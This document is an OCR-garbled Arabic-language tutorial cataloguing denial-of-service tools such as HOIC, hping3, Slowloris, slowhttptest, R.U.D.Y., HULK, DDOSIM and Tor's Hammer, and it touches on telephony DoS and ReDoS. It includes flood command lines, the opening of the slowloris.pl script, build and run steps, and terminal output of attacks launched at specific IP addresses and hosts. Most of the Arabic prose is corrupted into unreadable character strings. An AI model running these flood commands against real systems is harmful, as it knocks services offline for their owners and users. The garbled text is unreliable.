jl (^1 Jj^jj jjj" ^I^IujU jj sbbU jU^JI liA ^joijj JcVl J "(IRC) J j^-^ j 

b j^J>.Vl J dbVL ^aall ^aJJj CljjjjVl (Jj jia (jC (J^r> }} A \ > *aJ a d j^J>.Vl (JJ^J j dlj dj jAl ^aUaj ^j-d ^> <^>J 

^j|j ^cxiljjJ jA j .^a j^(g\l SAjuj Cj^I j IaK "dlj dj jAl" ^\ j LA£ ^flalljj 4^JHa3I ^if^ J^-C^"^ f>?^ ^ ^1 (Jj jia ^jC <L^lxJl 

jxJl Jc 4_ijjjj^3Vl CjIa^JI ^1 jj! ^jjjjjujI ^.1 J 4^jLouJIj b \ j^J! J^-j (JJJ ^JIaII ^.aulj 

u &La CJjiLj tji^ fe4 rtfall Jp J-aju 

High Orbit Ion Cannon (HOIC) * 
j^l 'High Orbit Ion Cannon (HOIC) 'LOIC Jl ' jL^^l SljtS LOIC "L^j" c£jj 

J jLl I ^3 j^ (Jfljoil iljkj'V ^ j-« (J^C-U lA jl j3 Jc bj b laJLAI djUV jll J <Ja*jM djI jj L-fll^JjoaV a ^ laJLuji ^aJ LdAic <C jjoij ^ jJ^all 

HTTP POSTJ^ jj ^U-Vl j^j^l 4d> j2, J ia^ jjjki >V! ja HOIC J J ."Megaupload.com" 

.^al^kiajVI <1^uj aj^jjoj Jl ^ ^luaxl l j J ^jli-A GET requests j 
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AjflLiaj AjjojLojI ^1 j£I ls 1c jlaJ is^J *b*bial dAib j\ (jSCtlpts) ^J 1 ^-al^)Jl '"bOOSter" ^ibiat (j-a AlJlxi (j-a£j 

c> ^tjS ^^kiauJl ^joij booster scripts ^ l-i^t <j£Jj CjUii ^\ s j^U« lAS^jj V HOIC t> ^ 

^UlS L_l*_j^al HOIC <*-lb^Jfc J* 7- J bui J?S^ JJ^ ^ Ja^tt JJOIC ^ V w " j 4i^JjaixJl £3 1 ^<J| (jJjbc 

Cjl (JA jll Jc ^DDoS L - J ^^ A (J^-^V f^-*-^ plaJI J L>^H JjVI <J^ (j-a l^l^klujl ^Jjl HOIC J^ 3 ^ JJ .£^1 J 

.HOICc>l?J^ yr^ >-2B V o-^jSVl 




Hping3 *k 

c5 j^Vl CjIj^VI l \ ^ikU ±\ jaVl c> jjc. j (j j^Vl <l^ajall CjIc^U^j (joi^ij jjV) 'HOIC j LOIC J) <abiaVb 
'hping <sbVI ^ ^ s^lj .4jj«-SI <j^ < Lu^l l ^ Ion Cannons J ^j^j^' o-^i^ c_llolj <j^Lkj <DDoS iP^V 
ICMP echo (O^ Jl^jl c>» c^jlli jll l^j^I -uli tcilb .ping ^b^U 4_£bu> U ^ J) <axAjJ)!\ jJjVl obi j& 

J TCP a£ j*. t> * jV t^l^i^l Hping .ping ^ c^ajESII ^I^IujVI j& j ^ K 1 t> i J request 

.l^^kloij (Jj^h jjVI 4_ajUs C5 ic hping lJIjj V c ( Jjl^lll CjIj^II lP^xj ^liloj 

Application ^ Kali Linux -^Information Gathering ^ Live Host Identification -> Hping3 

m 



rootOkali:~# hping3 -S 192 . 168 . 1 . 105 [a\ 1921 1] 
HPING 192.168.1.105 (eth© 192.168.1.105): S hs 
hping in flood mode, no replies will be shown 



.168.10.10 --flood 
set, 40 headers + 0 



data bytes 



^illj _a jUaJI .^^SU (j-aUJ! IP jIjjc- tdli axj ^ SYN Flag ^ j^j flood £jj ^ -S J^p^ 

.flooding ^ ^I^IojI —flood jb^J^ ^ .^J 5 ^ c?^^ IP u' t^j^ 
.hping3 —help j^'"^ <cUla (j^jia £p> ^ ^aLk!! CjljLikjl ^-ia^ ^bjj ^ 

Slowloris *k 

http : //ha. cker s . or g/slo wlori s 
"low and slow" t^*^ jSSVl ^ y\ c> ^axI3 lJU^V! ^ ^ straightforward brute-force flood <ab^V^ 
'Slowloris t ^-^^ ^ > ^^131 *L<»^J! (j>» (jLa^J! dal (*^^^ (j£-<uJI (j>» <J*^ t^l i^iLujVI <1^juj cjIj^I ^1 

(j-G (jbij^JI <JL^. ^5^* j '"RSnake" o^^a Cj^jjj l^Lb^j ^IS ^ill j <j^bij3l <xja3l <jj^alja <Jja ^ dm > j sl^l 

s gJJ ^ c^^JI ^ J) HTTP headers Jb- jj ^> c> HTTP request ^l^b ^UJl 

.<c jjAxJI L-jbHali ^ ^blsLill <c jjaij j^ta jjc. j^i 4^\-jja jA\ J ^^LiJI ciiVb^ajVl (j-« b ^1 b] .headers 
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m a( jSS JAnnl) ^Uaj Jaxj uLS 

http ://ha. ckers . org/slo wloris 

Download: slowloris.pl or slowloris6.pl (IPv6 version) <ija JiA\ ^ t>j 4 ^ > ^ l 



Version: Slowloris is currently at version 0.7 - 06/17/Z009 and 0.7.1 (IPv6 
version} - 04/02/2013 

Download: slovjloris.pl or si o wloris6. pi (IPv6 version) 

Getting started: per Woe slowloris.pl or perkJoc slovvloris6.pl 

Issues: For a complete list of issues look at the Perl documentation, which 
explains all of the things to think about when running this denial of service 
attack. 



# ! /usr/bin/perl -w 
use strict; 
use 10: : Socket : :INET; 
use 10: : Socket :: SSL; 
use Getopt : : Long; 
use Config; 

$SIG{'PIPE'} = "IGNORE'; 



♦Ignore broken pipe errors 



print «EOTEXT; 

CCCCCCCCCC00CC000O0888\@8\@888800O0CC0O0888888888\e\e\e\@\@\@\@\@\@S\@8\@\@\@\@88800Cooocccc: : : : 
CCCCCCCCCCCCCCCO0888\@888888OO0CCCO0OO888888888888\888888\@\@\@\@\@\@\@888\@8OOCCoococc: : : 
CCCCCCCCCCCCCC0088\6\e88888800O000OOO0888888808888888808080O08888\e88\e\e800C00OCoc: : 
CCCCooooooCCC088\@\@8\@88\@8880000000888888888880000000O00CCCCC0000888\@8888000Cc: : : : 
CooCoCoooCCC08\@88\@88888880008888888888888888880OOOCCCooooooooCC0O08888888Cocooc: 
ooooooCoCCC88\@88888\e888OO88888888888888880808888O0CCCooooccccccC0O0088\@8880Coccc 
OOOOCC0080888888888\@8808008888800888088880000888880COCOOCOC: : CCO0COO8O888888C000 
oCCCCCC080O0CCC0O88\@880O0OOO888808880OOOOC0O88888080OOCooCocc: : : C0COOO888888OOCC 
oCCCCC0O0880CooC088\@8O0O0O08808888880OCCCCoC0O088880O0OO00Coc: : : : C0COOOO888O88OC 
oCCCC00880OCCCC008\@\@80OC0OO0088888880oocccccoC080800880OO0OCc. : CCO0CCOOOO88888OO 
CCCOOOOS800CC0008\@88800CCoooC0088880oc: : . . . : : C0OO88888O888OO0 : cocooCCCCOOOOOOSSO 

CCC008888800C008\@\@8880Ccc: : :cC008880c cCOOOOOOOOOOOc . : cooooCCCOOOOOOOOO 

OOOOO088888OOO08\@8\@8Ooc: . : . . .c008088c. . . co0008880000CoooooccoCOOOOOCOOOO 

O0000888\e8\6888888880o : c08880c . . : oOOOOOOOOOCCoocooCoCoCOOOOOOOO 

COOOS88\6888888888880o: . .O8888C: .0CO0. . . . cCCCOOOoooooocccooooooooCCCOO 



La CjUjI^ <\ 4j3 ^cjouj j ^ > jj^^ A aaij slowloris.pl <*-ili t aL> ^jooj ^xi j A ^1 £>i& CjUjI^ a ^ja's ^cjouj ^ j£j 



i^Vl^ Jtla jjll jJjVI jk^ ^U3I jkJl ^jSj 



root@kali: /home 



FiLe Edit View Search Terminal. HeLp 



root@kali:-# cd /home/ 
root@kali:/home# Is 
si owl oris .pi 



root@kali:/home# chmod +x slowloris.pl 



root@kali:/home# Is 
slowloris. pi 

ot@kali:/home# | 



roo t(flkali : /home# . /si owl o ris . pi 



^l^i^Li 4j qA~A\ IP jic. ^yk. J^j^iJLi V jl ?J Si http://www.certifiedhacker.com ^Sj*II <-il.i$U .jjjj Uj| ^ jSijl 

:<^Vl£ host 



(./Slowloris) j-Vl U3S <> 0 VI P jfc 

I 



host www . ce rtif iedhacke r . com 
www.certifiedhacker.com has address 202 . 75 . 54 . 1Q1 

root@kal_i : ~# | 
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I^JVIS Slowloris J^a^l ^J^i^lj IP o'j^ £^ ^ 




ujjjU ^ jU£ GoAheadj Tomcat <dhttpd 'Apache Ja*2a-2 ^aaJ) ^Ij* ^ J** <ja^l ^ : 4jajal* 

CjUjj jl ^-iluaj uLUaj jjSjj Cjjfla Slowloris cr^ £-*L>^ <> 'Slowloris JJ^a ^ 

dii^ .4jsi^ JL^jI cjV jfcjijj* f v^nij ^1) Protocol-agnostic j J**^ ^ uj^ £^ ^ £^ :PyLoris 

.SOCKS jj^j TOR ^ .(JL^SVI bgj <<jl jSVl <~ cjVjSjjjjJI jliii 
.Go c> j nginx ^ Slowloris j* j :Goloris 

.Qt front end f^jj . Jj^j J^slt -u^i ^ <j'^j Slowloris ^ ^lill Jjtfll :QSlowloris 

.PHP c> I^Lxj^j Slowloris ja j :Unnamed PHP version 
.C++ ^ ^j&Aj \±± ^ j *<jM r <ASU* :SlowHTTPTest - 

ruby <^ Slow POST POC Slowloris :SlowlorisChecker - 

slowhttptest *t 
https://code.google.eom/p/slowhttptest 

CjI nala ^LiJlc. ^^Ic <J-a*J .(Jg-lflajll Alfla jlu^o ^^ic 4^^Jl ^ (jLa^pJl l— iLaaA (J^asu ^£L^J SAslx* obi ^ SlOWHTTPTeSt 

^ (jUaill (jlajC ^(^^-laJ CjLaaJb . jjAiij dlfl jjoj jjfLLJ ^aljVl ^lajuJj (<jjd£jjJ jl ^ - gala) CygWmj OSX 'U'^l^ 

-uii) Slow Read attack 'Slow HTTP POST 'Slowloris ^ jSSVl cjllnkil! 

c> Apache Range Header ? j ^1 cjVI^jVI L-il jil-I J!^k (TCP persist timer s ju ^JlJ 

cjUUI JUi£l c T JkL 4f j^| .HTTP JA^jjj J ^ c> a^u Slow HTTP POST j Slowloris o- 

^SLII jli tAjUll L pajkla JSjII jl£ lil jt ( jaJ HTTP s-^ jl£ lij .l^JU^ J\ Jja ^SLII Jja ^ J/qWi ^1 j UUj 

HTTP c> a-^^JI c> J j>^ti ^ ^ HTTP ^W 1 ^ J^jj 

$ tar -xzvf slowhttptest-x.x.tar.gz 

$ cd slowhttptest-x.x 

$ ./configure — prefix=PREFIX 

$ make 

$ make install 

( https://code.google.eom/p/slowhttptest/w/list ) wiki -Mj c> £±*+j ^l^kl^VI iHal 

.(man slowhttptest) ^ t*Ui j man c> 

iSlowloris ^ JUa 

./slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://someserver /resources/index.html - 
x 24 -p 3. 

R U Dead Yet? (R.U.D.Y.) i- 

https://code.google.eom/p/r-u-dead-yet j http://www.hybridsec.com/resource.html : j^-a^ll 
^ j .RU Dead Yet? (R.U.D.Y.) ^ j Slowloris J ^ j i> u u j^ 1 ^ 

."Are You Dead Yet?" M 
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l*/efc> server 

c> HTTP POST submissions lWJI & f ^> c> i> RUDY 

Slowloris lU^ US <HTTP headers 



o 
o 




Jam*. €.tvuxt(. ^ub^<?e4 




U/^b server 

browse 4lr\e wek>st4e 

cjUIaxJ R.U.D.Y. jUil>VI (jAj time POST s^j^ c^f^ ^ cjUjIxJI ^Ij cjAj JL± (jjjia t^lli ^ 
cJ^ i> ^ jUI to*) ^UJ! ilij Jj V ^ill POST ^ jU^V! "Application threads" J^ 11 

R.U.D.Y f ^!>J! dVl^iVI t> ! ji3 ^VimMlj <POST HTTP ^ "rest" ^ jU^I 
ff^^___ n( /j _ *_k>^U^ 




URL J*^ "forms" JliiVt o& ^SIL Ujliti ^ jB ^Ij ^"interactive console" 4_iktB <^jta ^ Ja*j sbVl ai* 
AiUbVUj .POST f *bV Vl.ikU ij M^jd cr^ 1 "form filed" j "form" JS^ c& ?^*«W ^UJ! j 

djUjuoS jjJI ^c^i ^ jj 2 j^^^V^ aIq -( jjj£i3l L_aL <J^b Ajjj^Jall cjULlaII jjs jj ^ iiiiill sbVI ttilli 

t5 lc lUs ^j^^ ^ .-W^ uj^^ j jjSj j^jSlI CjUL ^l^kiujU session persistence jSOCKS 

\A LiaJ 1^. L-Jxj gall cJ*-?^ Ux» tA^JjoJl (j^flaJ AjIa^JI (j-d L_Lu»£3l £yz S- 5 ^)^ ^ US [(JjxjujJ ^aUaj ^1 4L_lJj3! ^a^Li. ^1 

:0^jJI ^^J^ R.U.D.Y. 

JLl» jj3I ^ ^Vl <jI^S J5Lk tillij "Interactive menu mode" aJc^UjII 

$ ./r-u-dead-yet.py URL 

.(.config) ^l^c-VI URL <^^Sj "Unattended configuration-based execution" ^i^VI ciL ^Ul ^ ijilill 

#RefRef * 

^^ic ^jijj jjVI <iUjj ^b) t#RefRef ^ Jalaj ^LojI ^^ic jjc. o^lcl SjjSUll CjI q\ 

"Injection attack" ^W^j ^illj ^Ij ^Uaj ^ ^^kl^JI SQL database g^jt ^ ^Jj^jJI t <T » ^ t JalSj ^Uii 
C5 lc U jb^j (jjjia c> ^-a^i ^^UJ a^^A\ j^J! ^ L-WilU j^l^il ^joij #RefRef 'SQL injection ^I^IujU 
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V #RefRef <HOIC J LOIC t> J\ lS*& ^ ^\ ^ jA\ c^Ukfll 

6L_flajJa Jallj Cjb j SQL f.V^"iJ ^SLll/^UJl jl£ liU .l^-a j^Jfc dj^iU jtjiM IjJ^ ^UJl JaULJ J^j ^ dj^Vl t> I JJjS b^C- L-lUaJJ 
(jauuj jjVI dulS tSbVI J^J^ -^c- ■ ^Uaiil t . Ujujjj l_a jjoj ^jJI j CjVVI (>g l£ 4a1aJI liltiA (jj^J ^— a jjuj 4ita 

^.1 jll jl^-aJI 20" 10 < ■ illaJJj taj-a {JS ^ ^laJ <U > oJ Jj^Jl ^^>^ ^Uakj! ( . UjujJ Lu» t^a! ^<J! t fltla a ^glc DjUlkU 

.aSjSj 42 jaII 4_yu ^ Sj^lS s^l j 3JI ^> a^Ij 17 ^ jl£ <(Pastebin ^) ci^j .#RefRef lU*J 

(J£judj jjAljj ^^^ic Aaijjj ^jj ^aJ O^J CjIsu jjj ^Jax a £a (J.J£ p.. * ' ^ ^ .4-lilLuix» 4_k^aix» Igiacaj Lu» (J^iJ 4jlL l_j jj£ a $RefRef 



! Ad rn i n i strato r: C :\Wi n d ows\syste m 3 2\c rn d . exe 



:S>perl ./refref .pi 



== KPefRef == 



1*1 Sintax : ./refref .pi 



== Ref Ref == 



LlL 



ojlj C)\ c£*i V c^jlu^l lj* .(perl ./refref.pl Target_URL) j-l jVl jk- JMl <> jJl ^L-Vl f bii-VI 

f injected SQL commands J jjj ^^UJIj JU^jVI ^ ^i^j -oli #RefRef <^^? ^ j^? 

CTRL+C 



! Administrator: C:\Window5\5y5tern32\cmd.exe - perl ./refref.pl http:// 




XOIC J- 

http://sourceforge.net/projects/xoic 

JjSjj jjjj t( »ikiab»Sl (Jj3 j> lilt tlP jljie ^ ? jLk (^1 ^ylc DOS f» >M> .DOS "W* <_5 oljl gjA XOIC 

a^Ij ^ ^jL <gV ^LOIC .Sj^S c ljj LOIC 6- c5jai XOIC J uj^Aj XOIC .^^i^l jbiLl ^ 



V XOIC 



£2 
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normal DOS attack gH^' j j& j '■test mode ^-i <-«jj«-» 'J jVI JaUji ^Dtf ^ ^JU staV! t^lc. Jl>ij 

. TCP / HTTP / UDP / ICMP^j £- ^ c^l 2)05 atfacA; mode t^j > ^1 j >b ./node 

.DLR DoS j 8j 7 jj^j lS^*-*^^ ciaL 4 > ^> * ^ 1 ^ £3 j XOIC ^jj^ 3 ^ ^ ^ ^ ^ j s-yj^ 

HULK (HTTP Unbearable Load King) i- 

http://packetstormsecurityxom/files/112856/HULK-Http-Unbeara : j^-aJI 

^^klaaj ^UJ f^*^ ^ j ^j* W^ 3 ^ ls^ DoS f lsj^ HULK 




Scygdriue/cAiulk 



dninistrator(?XPCL-F5291558C9 ~ 
cd /cygdriue/c/hulk/ 

dnin istrator(?XPCL-F5291558C9 /cygdr iue/c/hulk 

Is 
mlk.py 

dnin istratorGXPCL-F5291558C9 /cygdr ive/c/hulk 

dir 
mlk.py 

dnin istratorGXPCL-F5291558C9 /cygdr ive/c/hulk 

python hulk.py http://192.168-3.lll safe 
— HULK Attack Started — 
n 73 Requests Sent 

76 Requests Sent 

77 Requests Sent 

078 Requests Sent 
179 Requests Sent 
280 Requests Sent 
381 Requests Sent 
482 Requests Sent 
583 Requests Sent 




DDOSIM - Layer 7 DDoS Simulator i- 

http://sourceforge.net/projects/ddosim : j^-a^ll 

C-LaaJb 4 a\ ikl^l ^jjj ;lg^juj| i^-JJ .(DoS) (j- 0 U^J^ C-lLi^A pbV 4_n«-^ L$J^ DDOSIM 

fiLl! lU* TCP cjVI^! jSj "Zombie" 5^ ."Zombie" o^^\ c> ^1 slSU^ J^U <> DDOS 

SbSn d^J jit g-^Ull 

Simulates several zombies in attack 
Random IP addresses 
TCP-connection-based attacks 
Application-layer DDOS attacks 

- HTTP DDoS with valid requests 

HTTP DDoS with invalid requests (similar to a DC++ attack) 

- SMTP DDoS 

TCP connection flood on random port 

I^Jtill Jajl J\ djUJ td&AJ sbVl oiA & **\ 

http://stormsecuritv.wordpress.com/2009/03/03/application-layer-ddos-simulator/ 

.^U]L^ jj^ HTTP J^-jjj ^u^l y^. IP ojjU^ ^> TCP ^Vl^il 10 

$. /ddosim -d 192.168.1.2 -p 80 -c 10 -r HTTPJNVALID -i ethO 

:EHLO J^j]j SMTP ^ J\ 10.4.4.0 ^ t> CjVU^I o-^b 
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$./ddosim -d 192.168.1.2 -p 25 -k 10.4.4.0 -cO -r SMTP_EHLO -i ethO 

.<^JL^a HTTP cjLIla ^JUt CjVI^jVI ^jni Jol jjoj J CjVU^jI 

$./ddosim -d 192.168.1.2 -p 80 -cO -wO -t 10 -r HTTP_VALID -i ethO 

Tor's Hammer *k 

http://packetstormsecurity.eom/files/9 8831 : j^-a^ll 
sj^ sbVl ^ .jj^U J slow POST sbi yr*j ■ jW^VI t> csj^ DoS *bV sbl ^ Tor's Hammer 

. jljj J IIS 



i i "« ii u ii vi ii uuuym i uipi i uuu! nj.uuuuuii i giy i LiiJii iiii y i 

File Edit View Search Terminal Help 



Slow POST DoS Testing Tool 
entropy [at] phtral net 
Anon-yntzed via Tor 
We are Legion. 



/torshammer py -t <target> [-r <threads> -p <port> -T -h] 
-t | --target <Hostname | IP> 

-r| --threads <Number of threads> Defaults to 256 

-p I --port <Web Server Port> Defaults to 80 

-T|--tor Enable anonyntstng through tor on 127. 0. 0. 1 9050 

-h I --help Shows this help 

Eg. /torshammer py -t 192. 168 1 100 -r 256 

anonymous@anonymous -/ ddos-tools/torshammer$ | 



OWASP HTTP Post Tool (layer 7 DDOS) *t 

p j^Jfc .Ua ^liJl L5 lc j^IS tiL (j-aUJl ^JJjll ^La> jl£ tit La J&aal] aLVt ^1 ikU aJ .DOS V"^ l£ ^ 

.dujjjVI <^ J& £fl ^ ^Ja DOS iiiiil ^■su.n jt 1 > >»jt t^liJJ laia (jjjJ .V jl DOS 



HTTP attack (slow header: and slow POST attack^ 
Test type and destination 

Attack type Slow POST | 

URL 



| http : //www, proa cti ve ri sk. co rn 



General parameters 

Connections 
Connection rate 
Timeout (s) 
User agent 



PI Random 



Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1 
EH Diagnostics 



Attack-specific para meters 

Content length 
POST field 



FH Random 



W\ Randomise payload 



Quit 



J 



J 



https://cloud.mail.ru/public/10deb4 1 5 1 ce4/HttpDosTool3 . 6.zip 

DAVOSET i- 

http://packetstormsecurity.com/files/123084/DAVOSET-l . 1 .3. html 
Jl cookies ^1 sbVl ^ <> di^Vl jt^Vt ^Ubt ^ j .DDOS ^'j^V csj^ sbi ^ DAVOSET 

.Packetstormsecurity c> DAVOSET A'&«\ mS j j^Vt cj! JjJI qa ^jaJI ^ 

GoldenEye HTTP Denial of Service Tool *t 

http://packetstormsecurity.com/files/120966/GoldenEye-HTTP-Denial-Of-Service-Too : j^iJI 
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Ljaj! ^Ull jSl j <DOS uj^W 6 j^j^ p 2 ^ j DOS f pt^V c5 GoldenEye 

DoSHTTP J- 

http://www.socketsoft.net 

b jj^j jlmJ sbtS HTTP Flood Denial of Service (DoS) *bV ^A* e I^V! <V ^-j ^ DoSHTTP 
o^ij *bVl ^jj "Port Designation" iiU-ll .HTTP Redirection 'URL Verification lUAj DoSHTTP 

.jjjISSII ^) 

^1 j c^j ^ DoSHTTP u^j .*Jl*ill HTTP cjUl^a iiiil ji* "sockets" ^ DoSHTTP 

aSliA ^LkJL <j^aLaJI AjIa^JI ~ j/ a *J s^j^ s.bl ^ CjU» jlx-<JI Li^. jl jj^i ^-1^ a AcLaaj (jl (j^j DoSHTTP 

.C-aLiai ^^>jl jjjiaj j CjLg jIslaII ujj m * lM* DoSHTTP j^j^ ^ . t — ^j-^V^ 

.HTTP Flood Denial of Service (DoS) *bV jU^I sliS e I^VI <V - 
. JUi HTTP cjULjaja *bV jl* "sockets" - 

.URL [http://host:port/] J^b lJ^JI iii* Qi^h 
.(^jblkl) LAits cjUg»^t jj sicV HTTP ^ SjIo] - 
.^luia^ll jjjla^l a!ac)j pbVl 4j5Ij* lU^ 

.User Agent header J 

.CjblAcVI ( ; ilia j "sockets" (juj^l L_flJ^su ^.^klLoi*!! ^jjj 

jj) (jjjU*] numeric addressing 

.dlljLliJl ^J^> S^lcjj L-flA^J! (jjjUc q,^J 

jUI liVL-ttl o- 15 '000 f^ij oVl - 



DoSHTTP - Socketsoft.net [Professional Edition] 



File Options Help 



HI rP Flood Denial of Service £ D o S } "Testing To o I 

Target URL 

I http: //www.vourcompanvwebserver. conn/ 

User Agent 

|Moz:illa/4.0 (compatible; MSIE Z.U: Windows NT 5.1; SV1 ; NET CLR 2.0.50727) 

Sockets 
|1 OOO 



Ft equests 



"onhinuous 



^ | Verify URL | 



Start Flood 



J_ 



http : sockets ■_■ f t .net/ 



R eady 



Sprut *t 









j> (jLoj^l TCP f el 


1 Sprwt 






- If- 1 xl 






1 








|30 




Stop 


Status: Cor^nc 


Gtirkg to 1 t S 


215.2S2.S9: 


GO ... 



O 



| "I "I 7^1 

I OK 



T J o error 

N1 ■.jlti-sv-sr^n-* TCF* Denial erf Si 
Coded by Ya*ix (yarix<3Kut.bv) 
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PHP Dos/DDoS Script (Dos Attack Tool) i- 

^4^^JI ^jUi^JIJ (jjjj^ A'sb .liiiil ^lq^^LuiaI] ^■..(u.hj PHP script j& ^—^o^-^ 1^ 



Your IP: (Do n-t Dc S van rs e ft nubT 



ft m * m m 



s ^ g r ai 



III Ell, »»0«1« 



n*4 1* pTBfcMBl 4 



. : = = l ...i . i. L-^i. .J: Jlo.iu.i 

end** Ifrl. m«J IV lH,tH7 l«. 140. 1M, I 



I Start rhe Attack—? 



Alter mitiaSnijihe DoS attack, Diease wail wttile the Browser loads 



• - A «.L> lk r^-,^ 



|W« JL 'J W |1 « J! U H !J M H* AS M „..,l.\ . p 

sS IssftsiSilisisii H is is is is is is ?s s£3 ***sg g* 



PH P DoS 




iffic at Victim Machine 




Janldos 



Supernove 
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DoS 



Telephony Denial-of-Service 



jjc j\ ciuj±i)!\ jic* 4jj jj^all CjlibL^xJ! J^j^)1 <Ljuj j VoIP j> Voice over IP (^j^V^ ^j^j-^ jj^) ^j-^V^ (J^-^ ^— 1 

^^kjjoaj j <£djuaj Ijjjuj ^jJj^aid ^j-^LijjjVl (j* cs-^-^j .Internet Protocol ^yMI (j^* ^^"^ c^i 

,j|,JC.| <J^-^ L>* ^^A^ 4_ijflj3l aifc ^!>JaJ ual ^aJ _4 jfflti £>,JA ^I^JjojU UajUfc I jJ,jL^JJ ^jl (ClljjjjVl) (IP) ^—^J-^V^ <J 

4JL^V) cjUakLAJI <> f>£ telephony denial-of-service (TDoS) jfrk ^ <<jAj>Ai <^UWI CjUL^I ISSj 

oil 

^ijj^xjj J jL^jS .(Jl j>*VI l!^ ( : <JJa-jJa3l Au ni <jLaaj| j i laJ > n jll j\ A-i^jJallj (j^aLkJl L_fljj^xJl <JL^jU £OLk-<Jl ^aUa 
Lui jll CjUJI£-<JI (J-g L_flWl 4_i^jJa3l L_flj*l& Ja j^->^ Jjl jC.] ^aJJ Clll^ <J-*^J ^-^J (jAaJill - *aJ1 J <JL^jV1 

cjUUIjI ^jaa 2002 ^ ^ J^V^ c^ 5 ^ uj^ c> u' Telephony denial-of-service 

^ajj (Jjj JJoUi tilL C Vil^l j CjVIj^jI ^ ^njujLjjoJi ^a jj^aJl (jijC-V A-ifljl^Jl Cj^Ij^jVI du^aJLajl L— Ll^ 6 jJ.ulJ.rtlA jJJ ^ jJjuoll 

.CjUUjjV! 

^gluaVl jL^ajVI j-ft dlla (Ajj^JI <Ja. jJl dili 4_a3jlgJl CjUJIUIj CjUJUJI Jld) <JfljlgJl dlLLjaJl ^ U JJC^ ^ ( flllkj TDoS 
,AjjUallj <JJJJjj3l ^1 jjoj 4_iflj*l^Jl dil rtlKrtll (jUalojl jl ^1 J^-j <JJajJa3l ^aJJ U^J 66jj£l<Jl AjIVI CjUJI^xJI £a Ja jiaaJI (Jlsuail (j^J 

.fax loop transmission J black faxj SMS flooding *ht ^1*^ c> j 
JjILj 4-4±aJ) ^jSj ^ill DDoS for hire c> jt caller ID spoofing 3-*^ jij* ^> dJL ^LSJI 

.JLaJI ^ 
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"Unintentional Denial-of-Service" Sj^ai* jjiil 4^±aJI ^> jUjaJI ^UaA 



^jS (J^ j-* Aa*^* ^ L ; ^udJ (JJdJ I^A J 4<Ja3lII jC L_fl3 jJ jl ^JaLLull CljjjjVI <£jjai ^glc j>» jj^J <^ill AJLaJl t *° - I^A 

dlli dljjljVl (^^ic £2 Ajc- i^v^J jl j£-aJ lifc ,<lnxjai ^^.ILJl (JjI^JI ^^jVI < ; UjuoJ 4JaLaUJ j£3 j olj^VI (j-a ^ jl 

CjjixJalixJ! jj A ^** Ui '^l Cy* ^ jl 4 a^jUllj .AjjU^VI 4_k^aa3l j^» £ '(JllxJl (J^f^J CS"^ -^^J A£jUj1aj uj 

jjjUII (jjaij IgJ 11a j tAiilS dllcLui jjjJaC. ^ -^1 J^l 1^ JjjS ji^U duUi — (JjjUII j-G uVVI dllft c£^lj (^jujLujVI ^^ic- 

. jjALuL&II (JjS j>» Jajlj Jj^J ^JJ LaAjc Ij laall ^^^-Sc j£Jj 6<jaiij j&VIPDoS J -L^J^ (* ci^ j-* <— fl^laixJl £3 ^^ic 
_dxJa^J jl UaUj IgJ Cj^. jlijJj Ja. J*. (JLg £§1 jli 6 2009 UJ 1 >1< ^ C-J^^ ^ jJ La^jc 

\ g i£ (j-G jj jlj Netgear j D-Link j^ <J^ jl L — ^ ^ j > * 4-^-i^JI < cjLa^a ^Lau] U^l 1 g a\ jj jl j3I s 

.4.^1 ji^Jl A j^Jl jl JjLuJI £j jjf ^2 jjiall J jjall ^ I jjA NTP ^1 (jl jc-j c> NTP 

URL ^'^C (Jll<Jl cJjJjuj c>5 lc ;^j^.Vl ^^Ic-VI (JjIjujj (Jjjia (jc Uiajl JjUui L jjc. ^jc t4^^Jl ^jUi^pJl ^^^j ^jl (j^J 

(j-* W^ 1 ^ L>^ '-^^^^ *^ JJ 1 ^^ ^^J^ cJ^-^- } J» lJ^ J^- (j- 0 ^*^»1J^-S pJJ (jlS lili .^jjjjilill ^^^ic 

Universal Tube & Rollform Equipment ^> ^2006 ^ 6 ^ cJ^ JSVl ^ ^ ^jjlil! cjI^Ij^VI iUj! ^ 

.^^jjII jjUail! (j^ajc ^ jlabd ^ijl JUJI ^ ^j^JI ciiflfljj ttdli 4 a^jjj j .utube.com 6a£jjoJI URL 

crowdsourcing service J^^^ dilLl 'Malaysia Airlines Flight 370 ^jjUJI dj^a jl axj ^2014 ^ u^j^ 



Denial-of-Service Level II 



DDoS f -W^ f ^ yr^ ^i>«ti ^jSI ^la^ll <JI (jiUaj t t iu>m jl DoS L2 f 

jj^ jx» jilj 4^ ja^JI jo UUj dij jjjVI Jj^a ^aiLuj (^Vl ciljLJI ^jj ^ a^Ixj liAj) IP header modification J 




Regular expression Denial of Service - ReDoS 




djllnki fkx* jl Jii^j ^ill ^^kJI j^ jUj^JI ja Regular expression Denial of Service (ReDoS) 
j£*j .(Cj^kAxJI jjj£ tiUdj AiixiLJI) ^j^Jj JaxJI < . ujujj ^^jII 4_LuAi3! ^LiajVI ^l J^ 3 ^ ^ Regular Expression 

.taa. <Ljla 6 jjal Ji«j3l ^ j^ j c5 jj^I CjVUJI ^ J j^^l Regular Expression ^I^IujU jJ3 t ju > nj jl ^1^11 

Liufl j]| 4- 

djU jj'VI j "regular expression" AjikiJ! jjjUj3I ^v^n <jjuj j^JI ^31^ ^ 
t^Jl...jl jjauo ( jJLd L-±auuJ jl ^i^ajll jo ^^Uloj^U ^jjIIaII j] ^^kioij ^ij j^j V jl aSLLJ! ^jjaj JVl ^Ijj^all " automaton" 
is'^ 1^ CjI^.VI (JjuAjujj j djjlj jjc. ^JjoiLoajlli CjI^VI Cj^LiAjujj L_a^llkl ^.jj j^3 j j^*-« (JjuAjolL CjI^.VI j-« ^.jc UjJ jj^ 

^5jjjjJa3l j-d (jaJ ^UlU t^Uaill I^J (j^aLkjl CjLg jjVI 1 ^-llc L_fljxJJ ^^jll 4jl13I j CjULud^Jl jA dlLa jlx-<Jl A^J^. ^^ic jl CjLg jIslaII ^^ic 
L-jL ^j\_£L^.\ j^-<» (Jj ^jL^Jl L-jL II ^jl_£L^.\ Lftjb ^jiajjixJl jxi ^jjjJ L_flljj^U 4iUaJl Jl^k^l Asu djx» (JjoiLanl! (jjoiij j^*JI 

,^l1jL<» jjVI jjoVi^ ^ jjc-jij L_jlAi3l j£-aj ^UlUj U3 <jjaii3lj jU3 jiLz qSIAj^*!] jja jlill 
. "automaton" <*— iLa jjVI (J^^ j^ a °jj ^ 1^ ^ IjIj jl ajjj j^j ^-?^^>^^ * ^ 

Evil Regexes Ua^j U ^ 
